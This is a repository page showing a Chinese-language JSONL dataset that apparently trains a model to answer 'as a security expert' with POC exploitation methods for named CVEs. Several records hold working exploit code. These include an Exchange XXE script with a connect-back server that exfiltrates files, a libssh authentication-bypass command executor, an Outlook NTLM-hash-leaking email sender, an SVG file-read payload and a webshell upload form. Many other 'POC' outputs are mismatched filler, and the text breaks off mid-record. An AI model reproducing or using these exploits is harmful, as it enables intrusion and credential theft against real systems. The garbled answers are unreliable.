Эхлэл Бүгдийг харах Тусламж
Бүртгүүлэх Нэвтрэх
wxcz_admin
/
project0802shenji
1
0
Салаа 0
Файлууд Асуудлууд 0 Хуулах хүсэлтүүд 0 Мэдлэгийн сан
Салаа: master
Салаанууд Тагууд
project0802shen...
/
data
/
processed
/
dedup_poc_security_training.jsonl

dedup_poc_security_training.jsonl 2.5 MB
Байнгын холболт Түүх Анхны өгөгдөл

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884885886887888889890891892893894895896897898899900901902903904905906907908909910911912913914915916917918919920921922923924925926927928929930931932933934935936937938939940941942943944945946947948949950951952953954955956957958959960961962963964965966967968969970971972973974975976977978979980981982983984985986987988989990991992993994995996997998999100010011002100310041005100610071008100910101011101210131014101510161017101810191020102110221023102410251026102710281029103010311032103310341035103610371038103910401041104210431044104510461047104810491050105110521053105410551056105710581059106010611062106310641065106610671068106910701071107210731074107510761077107810791080108110821083108410851086108710881089109010911092109310941095109610971098109911001101110211031104110511061107110811091110111111121113111411151116111711181119112011211122112311241125112611271128112911301131 
  1. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Microsoft Exchange 远程命令执行 CVE-2021-27065 26857 26858\n漏洞描述:Microsoft Exchange Server 是个消息与协作系统。Exchange Server可以被用来构架应用于企业、学校的邮件系统或免费邮件系统。2021年03月03日微软官方披露多个Exchange高危漏洞: ``` CVE-2021-26855 Exchange服务器端请求伪造漏洞。利用此漏洞的攻击者能够以Exchange Server发送HTTP请求,扫描内网,获取Exchange用户信息。 ``` ``` CVE-2021-26857 Exchange反序列化漏洞。该漏洞需要管理员权限,攻击者通过构造恶意请求,触发反序列化漏洞,在服务器上执行恶意代码。 ``` ``` CVE-2021-26858/CVE-2021-27065 Exchange中身份验证后的任意文件写入漏洞。攻击者可以通过CVE-2021-26855的ssrf漏洞获取到的Exchange administrator凭证,构造恶意请求,在系统上写入任意文件。 ```\n影响版本:``` Exchange 2013 Versions < 15.00.1497.012 Exchange 2016 CU18 < 15.01.2106.013 Exchange 2016 CU19 < 15.01.2176.009 Exchange 2019 CU7 < 15.02.0721.013 Exchange 2019 CU8 < 15.02.0792.010 ```\n网络测绘:``` icon_hash=\"1768726119\" ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2021-27065\n【POC利用方法】\n1. CVE-2021-26855\nExchange服务器端请求伪造漏洞。利用此漏洞的攻击者能够以Exchange Server发送HTTP请求,扫描内网,获取Exchange用户信息。\n2. CVE-2021-26857\nExchange反序列化漏洞。该漏洞需要管理员权限,攻击者通过构造恶意请求,触发反序列化漏洞,在服务器上执行恶意代码。\n3. CVE-2021-26858/CVE-2021-27065\nExchange中身份验证后的任意文件写入漏洞。攻击者可以通过CVE-2021-26855的ssrf漏洞获取到的Exchange administrator凭证,构造恶意请求,在系统上写入任意文件。\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Microsoft Exchange 远程命令执行 CVE-2021-27065 26857 26858.md"}
    2. 

  2. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Git-LFS 远程命令执行漏洞 CVE-2020-27955\n漏洞描述:Git LFS 是 Github 开发的一个 Git 的扩展,用于实现 Git 对大文件的支持 一些受影响的产品包括Git,GitHub CLI,GitHub Desktop,Visual Studio,GitKraden,SmartGit,Sourcetree等 该漏洞影响仅windows平台\n影响版本:``` Git-LFS(git-lfs)<= 2.12 ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2020-27955\n【POC利用方法】\n1. Git-LFS(git-lfs)<= 2.12\n2. git clone https://github.com/r00t4dm/CVE-2020-27955\n3. https://github.com/r00t4dm/CVE-2020-27955\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Git-LFS 远程命令执行漏洞 CVE-2020-27955.md"}
    3. 

  3. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Microsoft Exchange 信息泄露漏洞 CVE-2020-17143\n漏洞描述:此漏洞使远程攻击者可以披露有关受影响的Exchange Server安装的信息。利用身份验证才能利用此漏洞。 特定缺陷存在于GetWacIframeUrlForOneDrive服务命令的处理中。造成此问题的原因是缺乏对用户提供的xml的正确验证。攻击者可以利用此漏洞在SYSTEM上下文中披露信息。 Microsoft已发布更新来纠正此漏洞。可以在以下位置找到更多详细信息:https : //portal.msrc.microsoft.com/security-guidance/advisory/CVE-2020-17143 参考链接: - https://nvd.nist.gov/vuln/detail/CVE-2020-17143 - https://srcincite.io/advisories/src-2020-0030/\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2020-17143\n【POC利用方法】\n1. #!/usr/bin/env python3\nimport re\nimport sys\nimport urllib3\nimport requests\nfrom threading import Thread\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nclass xxe(BaseHTTPRequestHandler):\n    def log_message(self, format, *args):\n        return\n    def _set_response(self, d):\n        self.send_response(200)\n        self.send_header('Content-type', 'application/xml')\n        self.send_header('Content-Length', len(d))\n        self.end_headers()\n    def do_GET(self):\n        if \"leaked\" in self.path:\n            print(\"(+) stolen: %s\" % self.path)\n            message = \"<![CDATA[ <![ INCLUDE[]]> ]]>\"\n            self._set_response(message)\n            self.wfile.write(message.encode('utf-8'))\n            self.wfile.write('\\n'.encode('utf-8'))\n        elif \"poc.dtd\" in self.path:\n            print(\"(+) triggered xxe in exchange server!\")\n            message = \"\"\"\n<!ENTITY %% payload \"%%start;%%stuff;%%end;\">\n<!ENTITY %% param1 '<!ENTITY &#x25; external SYSTEM \"http://%s:%d/leaked?%%payload;\">'>\n%%param1; %%external;\"\"\" % (host, int(port))\n            self._set_response(message)\n            self.wfile.write(message.encode('utf-8'))\n            self.wfile.write('\\n'.encode('utf-8'))\n        elif \"poc.xml\" in self.path:\n            d = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE root [\n <!ENTITY %% start \"<![CDATA[\">\n <!ENTITY %% stuff SYSTEM \"file:///%s\">\n<!ENTITY %% end \"]]>\">\n<!ENTITY %% dtd SYSTEM \"http://%s:%d/poc.dtd\">\n%%dtd;\n]>\"\"\" % (file, host, int(port))\n            self._set_response(d)\n            self.wfile.write(d.encode('utf-8'))\n            self.wfile.write('\\n'.encode('utf-8'))\n        return\n\ndef main(t, usr, pwd, port):\n    server = HTTPServer(('0.0.0.0', port), xxe)\n    handlerthr = Thread(target=server.serve_forever, args=())\n    handlerthr.daemon = True\n    handlerthr.start()\n    s = requests.Session()\n    d = {\n        \"destination\" : \"https://%s/owa\" % t,\n        \"flags\" : \"\",\n        \"username\" : usr,\n        \"password\" : pwd\n    }\n    s.post(\"https://%s/owa/auth.owa\" % t, data=d, verify=False)\n    h = {\n        \"X-OWA-UrlPostData\" : '{\"request\":{\"DocumentUrl\":\"\",\"EndPointUrl\":\"http://%s:%d/poc.xml\"}}' % (host, port),\n        \"Action\" : \"GetWacIframeUrlForOneDrive\"\n    }\n    r = s.post(\"https://%s/owa/service.svc\" % t, headers=h, verify=False)\n    assert s.cookies.get(name='X-OWA-CANARY') != None, \"(-) couldn't leak the csrf canary!\" \n    h[\"X-OWA-CANARY\"] = s.cookies.get(name='X-OWA-CANARY')\n    s.post(\"https://%s/owa/service.svc\" % t, headers=h, verify=False)\n    \nif __name__ == '__main__':\n    if len(sys.argv) != 5:\n        print(\"(+) usage: %s <target> <user:pass> <connectback ip:port> <file>\" % sys.argv[0])\n        print(\"(+) eg: %s 192.168.75.142 harryh@exchangedemo.com:user123# 192.168.75.1:9090 \\\"C:/Users/harryh/secrets.txt\\\"\" % sys.argv[0])\n        sys.exit(-1)\n    trgt = sys.argv[1]\n    assert \":\" in sys.argv[2], \"(-) you need a user and password!\"\n    usr = sys.argv[2].split(\":\")[0]\n    pwd = sys.argv[2].split(\":\")[1]\n    host = sys.argv[3]\n    port = 9090\n    file = sys.argv[4]\n    if \":\" in sys.argv[3]: \n        host = sys.argv[3].split(\":\")[0]\n        port = sys.argv[3].split(\":\")[1]\n        assert port.isdigit(), \"(-) not a port number!\"\n    main(trgt, usr, pwd, int(port))\n2. \"X-OWA-UrlPostData\" : '{\"request\":{\"DocumentUrl\":\"\",\"EndPointUrl\":\"http://%s:%d/poc.xml\"}}' % (host, port),\n3. \"Action\" : \"GetWacIframeUrlForOneDrive\"\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Microsoft Exchange 信息泄露漏洞 CVE-2020-17143.md"}
    4. 

  4. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Microsoft Exchange SSRF漏洞 CVE-2021-26885\n漏洞描述:Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证\n影响版本:``` Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 ```\n网络测绘:``` icon_hash=\"1768726119\" ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2021-26885\n【POC利用方法】\n1. Exchange 2013 Versions < 15.00.1497.012,\nExchange 2016 CU18 < 15.01.2106.013,\nExchange 2016 CU19 < 15.01.2176.009,\nExchange 2019 CU7 < 15.02.0721.013,\nExchange 2019 CU8 < 15.02.0792.010\n2. icon_hash=\"1768726119\"\n3. /owa/auth/Current/themes/resources/logon.css\n/owa/auth/Current/themes/resources/...\n/ecp/default.flt\n/ecp/main.css\n/ecp/<single char>.js\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Microsoft Exchange SSRF漏洞 CVE-2021-26885.md"}
    5. 

  5. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Libssh 服务端权限认证绕过漏洞 CVE-2018-10933\n漏洞描述:libssh是一个提供ssh相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送`MSG_USERAUTH_SUCCESS`消息,绕过认证过程,未授权访问目标SSH服务器。 参考资料: - https://www.libssh.org/security/advisories/CVE-2018-10933.txt - https://www.seebug.org/vuldb/ssvid-97614\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2018-10933\n【POC利用方法】\n1. docker-compose up -d\n2. ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p 2222 myuser@127.0.0.1\n3. #!/usr/bin/env python3\nimport sys\nimport paramiko\nimport socket\nimport logging\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\nbufsize = 2048\n\n\ndef execute(hostname, port, command):\n    sock = socket.socket()\n    try:\n        sock.connect((hostname, int(port)))\n\n        message = paramiko.message.Message()\n        transport = paramiko.transport.Transport(sock)\n        transport.start_client()\n\n        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)\n        transport._send_message(message)\n\n        client = transport.open_session(timeout=10)\n        client.exec_command(command)\n\n        # stdin = client.makefile(\"wb\", bufsize)\n        stdout = client.makefile(\"rb\", bufsize)\n        stderr = client.makefile_stderr(\"rb\", bufsize)\n\n        output = stdout.read()\n        error = stderr.read()\n\n        stdout.close()\n        stderr.close()\n\n        return (output+error).decode()\n    except paramiko.SSHException as e:\n        logging.exception(e)\n        logging.debug(\"TCPForwarding disabled on remote server can't connect. Not Vulnerable\")\n    except socket.error:\n        logging.debug(\"Unable to connect.\")\n\n    return None\n\n\nif __name__ == '__main__':\n    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Libssh 服务端权限认证绕过漏洞 CVE-2018-10933.md"}
    6. 

  6. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GIT-SHELL 沙盒绕过 CVE-2017-8386\n漏洞描述:GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 参考链接: - https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/ - https://www.leavesongs.com/PENETRATION/git-shell-cve-2017-8386.html\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2017-8386\n【POC利用方法】\n1. docker-compose up -d\n2. ssh -p 3322 -i id_rsa -t git@127.0.0.1 \"git-upload-archive '--help'\"\n3. ssh -p 3322 -i id_rsa -t git@127.0.0.1 \"git-upload-archive '--help'\"\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/GIT-SHELL 沙盒绕过 CVE-2017-8386.md"}
    7. 

  7. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Ueditor 编辑器漏洞总结\n漏洞描述:UEditor 是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。 界面如下: ![ueditor-1](images/ueditor-1.webp)\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【POC利用方法】\n1. http://www.xxxx.com/net/controller.ashx?action=listfile\n2. http://www.xxxx.com/ueditor/net/controller.ashx?action=listimage\n3. <form action=\"http://www.xxxx.com/ueditor/net/controller.ashx?action=catchimage\" enctype=\"application/x-www-form-urlencoded\" method=\"POST\">\n\n    <p>shell addr: <input type=\"text\" name=\"source[]\" /></p>\n\n    <input type=\"submit\" value=\"Submit\" />\n\n</form>\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Ueditor 编辑器漏洞总结.md"}
    8. 

  8. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:librsvg XInclude 文件包含漏洞 CVE-2023-38633\n漏洞描述:librsvg是一个用于处理SVG图片的开源依赖库。 librsvg支持XML中的XInclude规范,可以用于加载外部内容。在librsvg 2.56.3版本以前,由于处理路径存在逻辑错误,导致攻击者可以传入一个恶意构造的SVG图片,进而读取到任意文件。 参考链接: - https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/ - https://gitlab.gnome.org/GNOME/librsvg/-/issues/996\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2023-38633\n【POC利用方法】\n1. docker compose up -d\n2. <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n<svg width=\"300\" height=\"300\" xmlns:xi=\"http://www.w3.org/2001/XInclude\">\n  <rect width=\"300\" height=\"300\" style=\"fill:rgb(255,255,255);\" />\n  <text x=\"10\" y=\"100\">\n    <xi:include href=\".?../../../../../../../../../../etc/passwd\" parse=\"text\" encoding=\"UTF-8\">\n      <xi:fallback>file not found</xi:fallback>\n    </xi:include>\n  </text>\n</svg>\n3. <rect width=\"300\" height=\"300\" style=\"fill:rgb(255,255,255);\" />\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/librsvg XInclude 文件包含漏洞 CVE-2023-38633.md"}
    9. 

  9. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Microsoft Outlook 权限提升漏洞 CVE-2023-23397\n漏洞描述:该漏洞存在于 Microsoft Outlook 中,是一个身份验证绕过漏洞。未经身份验证的远程攻击者仅通过向受影响的系统发送特制电子邮件,从而访问用户的Net-NTLMv2 哈希,进而可以在中继攻击中使用此哈希来冒充用户,从而有效地绕过身份验证。\n影响版本:``` Microsoft Outlook 2016 (64-bit edition) Microsoft Outlook 2013 Service Pack 1 (32-bit editions) Microsoft Outlook 2013 RT Service Pack 1 Microsoft Outlook 2013 Service Pack 1 (64-bit editions) Microsoft Office 2019 for 32-bit editions Microsoft 365 Apps for Enterprise for 32-bit Systems Microsoft Office 2019 for 64-bit editions Microsoft 365 Apps for Enterprise for 64-bit Systems Microsoft Office LTSC 2021 for 64-bit editions Microsoft Outlook 2016 (32-bit edition) Microsoft Office LTSC 2021 for 32-bit editions ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2023-23397\n【POC利用方法】\n1. Microsoft Outlook 2016 (64-bit edition)\nMicrosoft Outlook 2013 Service Pack 1 (32-bit editions)\nMicrosoft Outlook 2013 RT Service Pack 1\nMicrosoft Outlook 2013 Service Pack 1 (64-bit editions)\nMicrosoft Office 2019 for 32-bit editions\nMicrosoft 365 Apps for Enterprise for 32-bit Systems\nMicrosoft Office 2019 for 64-bit editions\nMicrosoft 365 Apps for Enterprise for 64-bit Systems\nMicrosoft Office LTSC 2021 for 64-bit editions\nMicrosoft Outlook 2016 (32-bit edition)\nMicrosoft Office LTSC 2021 for 32-bit editions\n2. python CVE-2023-23397.py --path '\\\\your-ip\\'\n3. import smtplib, datetime, argparse\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.application import MIMEApplication\nfrom email.utils import COMMASPACE, formatdate\nfrom independentsoft.msg import Message\n\n## Mail configuration : change it !\nsmtp_server = \"mail.example.com\"\nsmtp_port = 587\n\nsender_email = \"attacker@mail.example.com\"\nsender_password = \"P@ssw0rd\"\n\nrecipients_email = [\"victim@mail.example.com\"]\n\nclass Email:\n    def __init__(self, smtp_server, port, username, password, recipient):\n        self.smtp_server = smtp_server\n        self.port = port\n        self.username = username\n        self.password = password\n        self.recipient = recipient\n\n    def send(self, subject, body, attachment_path):\n        msg = MIMEMultipart()\n        msg['From'] = self.username\n        msg['To'] = COMMASPACE.join(self.recipient)\n        msg['Date'] = formatdate(localtime=True)\n        msg['Subject'] = subject\n        \n        msg.attach(MIMEText(body))\n\n        with open(attachment_path, 'rb') as f:\n            part = MIMEApplication(f.read(), Name=attachment_path)\n            part['Content-Disposition'] = f'attachment; filename=\"{attachment_path}\"'\n            msg.attach(part)\n\n        try:\n            server = smtplib.SMTP(self.smtp_server, self.port)\n            server.starttls()\n            server.login(self.username, self.password)\n            server.sendmail(self.username, self.recipient, msg.as_string())\n            server.quit()\n            print(\"[+] Malicious appointment sent !\")\n\n\n        except Exception as e:\n            print(\"[-] Error with SMTP server...\", e)\n\nparser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')\nparser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)\nargs = parser.parse_args()\n\nappointment = Message()\nappointment.message_class = \"IPM.Appointment\"\nappointment.subject = \"CVE-2023-23397\"\nappointment.body = \"New meeting now !\"\nappointment.location = \"Paris\"\nappointment.appointment_start_time = datetime.datetime.now()\nappointment.appointment_end_time = datetime.datetime.now()\nappointment.reminder_override_default = True\nappointment.reminder_sound_file = args.path\nappointment.save(\"appointment.msg\")\n\nemail = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)\n\nsubject = \"Hello There !\"\nbody = \"Important appointment !\"\nemail.send(subject, body, \"appointment.msg\")\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Microsoft Outlook 权限提升漏洞 CVE-2023-23397.md"}
    10. 

  10. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Windows Chrome 远程命令执行漏洞\n漏洞描述:Windows Chrome 0day  在 2021-4-13 被公开 该漏洞未绕过沙箱,需要关闭沙箱才能成功弹出计算器 ``` 右键图标-->属性,然后在目标后面加上 -no-sandbox 点击确认 ```\n影响版本:``` Window Chrome 浏览器 ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【POC利用方法】\n1. # 关闭沙箱\n右键图标-->属性,然后在目标后面加上 -no-sandbox\n点击确认\n2. Window Chrome 浏览器\n3. <script src=\"exploit.js\"></script>\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Windows Chrome 远程命令执行漏洞.md"}
    11. 

  11. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Ueditor编辑器漏洞总结\n漏洞描述:UEditor 是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。 界面如下: ![ueditor-1](images/ueditor-1.webp)\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【POC利用方法】\n1. http://www.xxxx.com/net/controller.ashx?action=listfile\n2. http://www.xxxx.com/ueditor/net/controller.ashx?action=listimage\n3. <form action=\"http://www.xxxx.com/ueditor/net/controller.ashx?action=catchimage\" enctype=\"application/x-www-form-urlencoded\" method=\"POST\">\n\n    <p>shell addr: <input type=\"text\" name=\"source[]\" /></p>\n\n    <input type=\"submit\" value=\"Submit\" />\n\n</form>\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Ueditor编辑器漏洞总结.md"}
    12. 

  12. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:DNS域传送漏洞\n漏洞描述:DNS协议支持使用axfr类型的记录进行区域传送,用来解决主从同步的问题。如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源,将会导致DNS域传送漏洞。 axfr:DNS Zone Transfer Protocol (AXFR),dns的全量更新协议,dns主从架构更新,从向主获取zone的全量数据,由主返回axfr消息,全量刷新该zone的slave信息。 参考链接: - https://www.acunetix.com/blog/articles/dns-zone-transfers-axfr/ - https://nmap.org/nsedoc/scripts/dns-zone-transfer.html\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. - https://nmap.org/nsedoc/scripts/dns-zone-transfer.html\n3. Vulhub使用[Bind9](https://wiki.debian.org/Bind9)来搭建dns服务器,但不代表只有Bind9支持AXFR记录。运行DNS服务器:\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/DNS域传送漏洞.md"}
    13. 

  13. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:NVIDIA GPU显示驱动程序 信息泄露 CVE-2021-1056\n漏洞描述:用于Linux的NVIDIA GPU显示驱动程序在内核模式层(`nvidia.ko`)中包含一个漏洞,在该漏洞中,它没有完全遵守操作系统文件系统提供GPU设备级隔离的权限,这可能导致拒绝服务或信息泄露。 参考阅读: - https://github.com/pokerfaceSad/CVE-2021-1056/blob/master/docs/QuickStart.md\n影响版本:``` NVIDIA GPU显示驱动程序 ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2021-1056\n【POC利用方法】\n1. NVIDIA GPU显示驱动程序\n2. git clone https://github.com/pokerfaceSad/CVE-2021-1056.git\ncd CVE-2021-1056\ndocker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash\n3. In Container# nvidia-smi\nSat Jan  9 07:21:03 2021       \n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |\n|-------------------------------+----------------------+----------------------+\n| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |\n| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |\n|                               |                      |               MIG M. |\n|===============================+======================+======================|\n|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |\n| N/A   27C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |\n|                               |                      |                  N/A |\n+-------------------------------+----------------------+----------------------+\n\n+-----------------------------------------------------------------------------+\n| Processes:                                                                  |\n|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |\n|        ID   ID                                                   Usage      |\n|=============================================================================|\n|  No running processes found                                                 |\n+-----------------------------------------------------------------------------+\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/NVIDIA GPU显示驱动程序 信息泄露 CVE-2021-1056.md"}
    14. 

  14. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Samba 远程命令执行漏洞 CVE-2017-7494\n漏洞描述:Samba允许连接一个远程的命名管道,并且在连接前会调用`is_known_pipename()`函数验证管道名称是否合法。在`is_known_pipename()`函数中,并没有检查管道名称中的特殊字符,加载了使用该名称的动态链接库。导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码。 该漏洞要求的利用条件: - 拥有共享文件写入权限,如:匿名可写等 - 需要知道共享目录的物理路径 参考: - https://medium.com/@lucideus/sambacry-rce-exploit-lucideus-research-3a3e5bd9e17c - https://github.com/opsxcq/exploit-CVE-2017-7494 - http://bobao.360.cn/learning/detail/3900.html\n影响版本:``` Samba版本:4.6.3(该漏洞在4.6.4被修复) ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2017-7494\n【POC利用方法】\n1. Samba版本:4.6.3(该漏洞在4.6.4被修复)\n2. docker-compose up -d\n3. $ conda create -n py27 python=2.7\n$ pip install -r requirements.txt\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Samba 远程命令执行漏洞 CVE-2017-7494.md"}
    15. 

  15. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363\n漏洞描述:Foxit PDF Reader 及 Editor 中存在任意代码执行漏洞,由于 Foxit PDFReader/Editor 未验证 exportXFAData 方法中的 cPath 参数,使得恶意的.hta 文件写入 Startup 目录中,攻击者可通过诱导受害者打开特制的 PDF 文档触发此漏洞,系统重启后将执行攻击者的恶意代码。\n影响版本:``` Foxit PDF Reader <= 12.1.1.15289 Foxit PDF Editor 12.x <= 12.1.1.15289 Foxit PDF Editor 11.x <= 11.2.5.53785 Foxit PDF Editor <= 10.1.11.37866 ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2023-27363\n【POC利用方法】\n1. Foxit PDF Reader <= 12.1.1.15289\nFoxit PDF Editor 12.x <= 12.1.1.15289\nFoxit PDF Editor 11.x <= 11.2.5.53785\nFoxit PDF Editor <= 10.1.11.37866\n2. https://github.com/j00sean/SecBugs/tree/main/CVEs/CVE-2023-27363\n3. 2. 手动下载更新:https://www.foxit.com/downloads/\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363.md"}
    16. 

  16. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Microsoft Exchange Server 远程执行代码漏洞 CVE-2020-17083\n漏洞描述:参考链接: - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17083 - https://srcincite.io/pocs/cve-2020-17083.ps1.txt\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2020-17083\n【POC利用方法】\n1. # Microsoft Exchange Server ExportExchangeCertificate WriteCertiricate File Write Remote Code Execution Vulnerability\n# Patch: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17083\n# CVSS v3: 9.1 (/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C)\n# \n# Notes:\n#\n# The (ab)user needs the \"Exchange Server Certificates\" role assigned\n# [PS] C:\\Windows\\system32>New-RoleGroup -Name \"cert users\" -Roles \"Exchange Server Certificates\" -Members \"harryh\"\n# \n# Name       AssignedRoles                  RoleAssignments                           ManagedBy\n# ----       -------------                  ---------------                           ---------\n# cert users {Exchange Server Certificates} {Exchange Server Certificates-cert users} {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/Admin}\n# \n#\n# [PS] 